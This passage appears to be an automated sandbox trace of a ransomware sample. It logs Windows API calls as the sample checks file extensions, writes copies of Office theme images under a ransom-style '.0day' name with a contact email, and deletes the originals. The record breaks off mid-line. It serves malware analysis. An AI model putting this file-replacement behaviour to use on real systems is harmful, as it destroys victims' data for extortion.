lstrlenW (lpString=".doc") returned 4 [0044.650] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.650] lstrlenW (lpString=".docx") returned 5 [0044.650] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.650] lstrlenW (lpString=".pdf") returned 4 [0044.650] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.650] lstrlenW (lpString=".xls") returned 4 [0044.650] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.650] lstrlenW (lpString=".xlsx") returned 5 [0044.651] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.651] lstrlenW (lpString=".ppt") returned 4 [0044.651] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.651] lstrlenW (lpString=".zip") returned 4 [0044.651] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.651] lstrlenW (lpString=".rar") returned 4 [0044.651] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.651] lstrlenW (lpString=".bz2") returned 4 [0044.651] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.651] lstrlenW (lpString=".7z") returned 3 [0044.651] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.651] lstrlenW (lpString=".dbf") returned 4 [0044.651] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.651] lstrlenW (lpString=".1cd") returned 4 [0044.651] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.651] lstrlenW (lpString=".jpg") returned 4 [0044.651] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.651] lstrlenW (lpString=".doc") returned 4 [0044.651] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.651] lstrlenW (lpString=".docx") returned 5 [0044.651] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.651] lstrlenW (lpString=".pdf") returned 4 [0044.651] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.651] lstrlenW (lpString=".xls") returned 4 [0044.651] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.652] lstrlenW (lpString=".xlsx") returned 5 [0044.652] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.652] lstrlenW (lpString=".ppt") returned 4 [0044.652] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.652] lstrlenW (lpString=".zip") returned 4 [0044.652] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.652] lstrlenW (lpString=".rar") returned 4 [0044.652] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.652] lstrlenW (lpString=".bz2") returned 4 [0044.652] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.652] lstrlenW (lpString=".7z") returned 3 [0044.652] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.652] lstrlenW (lpString=".dbf") returned 4 [0044.652] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.652] lstrlenW (lpString=".1cd") returned 4 [0044.652] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.652] lstrlenW (lpString=".jpg") returned 4 [0044.652] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.652] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0044.652] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.652] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.653] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=20575) returned 1 [0044.653] CloseHandle (hObject=0x1fc) returned 1 [0044.653] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png")) returned 0x20 [0044.653] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.653] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.653] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.653] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.653] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.653] GetLastError () returned 0x0 [0044.653] ReadFile (in: hFile=0x1fc, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x505f, lpOverlapped=0x0) returned 1 [0044.903] WriteFile (in: hFile=0x20c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x5060, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x5060, lpOverlapped=0x0) returned 1 [0044.904] ReadFile (in: hFile=0x1fc, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.904] WriteFile (in: hFile=0x20c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.904] SetEndOfFile (hFile=0x20c) returned 1 [0044.904] CloseHandle (hObject=0x20c) returned 1 [0044.904] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.904] SetEndOfFile (hFile=0x1fc) returned 1 [0044.905] CloseHandle (hObject=0x1fc) returned 1 [0044.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.906] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png")) returned 1 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.906] lstrlenW (lpString=".doc") returned 4 [0044.906] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.906] lstrlenW (lpString=".docx") returned 5 [0044.906] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.906] lstrlenW (lpString=".pdf") returned 4 [0044.906] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.906] lstrlenW (lpString=".xls") returned 4 [0044.906] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.906] lstrlenW (lpString=".xlsx") returned 5 [0044.906] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.906] lstrlenW (lpString=".ppt") returned 4 [0044.906] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.906] lstrlenW (lpString=".zip") returned 4 [0044.906] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.906] lstrlenW (lpString=".rar") returned 4 [0044.906] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.906] lstrlenW (lpString=".bz2") returned 4 [0044.906] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.906] lstrlenW (lpString=".7z") returned 3 [0044.906] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.906] lstrlenW (lpString=".dbf") returned 4 [0044.906] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.907] lstrlenW (lpString=".1cd") returned 4 [0044.907] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.907] lstrlenW (lpString=".jpg") returned 4 [0044.907] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.907] lstrlenW (lpString=".doc") returned 4 [0044.907] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.907] lstrlenW (lpString=".docx") returned 5 [0044.907] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.907] lstrlenW (lpString=".pdf") returned 4 [0044.907] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.907] lstrlenW (lpString=".xls") returned 4 [0044.907] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.907] lstrlenW (lpString=".xlsx") returned 5 [0044.907] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.907] lstrlenW (lpString=".ppt") returned 4 [0044.907] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.907] lstrlenW (lpString=".zip") returned 4 [0044.907] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.907] lstrlenW (lpString=".rar") returned 4 [0044.907] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.907] lstrlenW (lpString=".bz2") returned 4 [0044.907] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.907] lstrlenW (lpString=".7z") returned 3 [0044.907] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.907] lstrlenW (lpString=".dbf") returned 4 [0044.907] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.907] lstrlenW (lpString=".1cd") returned 4 [0044.907] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.908] lstrlenW (lpString=".jpg") returned 4 [0044.908] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.908] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0044.908] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.908] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1453) returned 1 [0044.908] CloseHandle (hObject=0x1fc) returned 1 [0044.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif")) returned 0x20 [0044.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.908] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.909] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.909] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.955] GetLastError () returned 0x0 [0044.955] ReadFile (in: hFile=0x1fc, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x5ad, lpOverlapped=0x0) returned 1 [0045.069] WriteFile (in: hFile=0x20c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0045.070] ReadFile (in: hFile=0x1fc, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0045.070] WriteFile (in: hFile=0x20c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.071] SetEndOfFile (hFile=0x20c) returned 1 [0045.071] CloseHandle (hObject=0x20c) returned 1 [0045.071] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.071] SetEndOfFile (hFile=0x1fc) returned 1 [0045.071] CloseHandle (hObject=0x1fc) returned 1 [0045.072] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.072] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif")) returned 1 [0045.072] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0045.072] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0045.072] lstrlenW (lpString=".doc") returned 4 [0045.072] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.072] lstrlenW (lpString=".docx") returned 5 [0045.072] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.072] lstrlenW (lpString=".pdf") returned 4 [0045.072] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.072] lstrlenW (lpString=".xls") returned 4 [0045.072] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.072] lstrlenW (lpString=".xlsx") returned 5 [0045.072] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.072] lstrlenW (lpString=".ppt") returned 4 [0045.072] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.072] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0045.072] lstrlenW (lpString=".zip") returned 4 [0045.072] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.072] lstrlenW (lpString=".rar") returned 4 [0045.072] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.072] lstrlenW (lpString=".bz2") returned 4 [0045.073] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.073] lstrlenW (lpString=".7z") returned 3 [0045.073] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.073] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0045.073] lstrlenW (lpString=".dbf") returned 4 [0045.073] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.073] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0045.073] lstrlenW (lpString=".1cd") returned 4 [0045.073] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.073] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0045.073] lstrlenW (lpString=".jpg") returned 4 [0045.073] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.073] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0045.073] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0045.073] lstrlenW (lpString=".doc") returned 4 [0045.073] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.073] lstrlenW (lpString=".docx") returned 5 [0045.073] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.073] lstrlenW (lpString=".pdf") returned 4 [0045.073] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.073] lstrlenW (lpString=".xls") returned 4 [0045.073] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.073] lstrlenW (lpString=".xlsx") returned 5 [0045.073] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.073] lstrlenW (lpString=".ppt") returned 4 [0045.073] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.073] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0045.073] lstrlenW (lpString=".zip") returned 4 [0045.073] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.073] lstrlenW (lpString=".rar") returned 4 [0045.073] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.073] lstrlenW (lpString=".bz2") returned 4 [0045.073] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.073] lstrlenW (lpString=".7z") returned 3 [0045.073] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.073] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0045.074] lstrlenW (lpString=".dbf") returned 4 [0045.074] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.074] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0045.074] lstrlenW (lpString=".1cd") returned 4 [0045.074] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.074] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0045.074] lstrlenW (lpString=".jpg") returned 4 [0045.074] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.074] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0045.074] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.074] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0045.145] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1347) returned 1 [0045.145] CloseHandle (hObject=0x1d8) returned 1 [0045.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif")) returned 0x20 [0045.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0045.145] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.145] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0045.929] GetLastError () returned 0x0 [0045.929] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x543, lpOverlapped=0x0) returned 1 [0045.945] WriteFile (in: hFile=0x1fc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x550, lpOverlapped=0x0) returned 1 [0045.946] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0045.946] WriteFile (in: hFile=0x1fc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.946] SetEndOfFile (hFile=0x1fc) returned 1 [0045.946] CloseHandle (hObject=0x1fc) returned 1 [0045.946] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.946] SetEndOfFile (hFile=0x1d8) returned 1 [0045.947] CloseHandle (hObject=0x1d8) returned 1 [0045.947] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.947] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif")) returned 1 [0045.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0045.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0045.947] lstrlenW (lpString=".doc") returned 4 [0045.947] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned 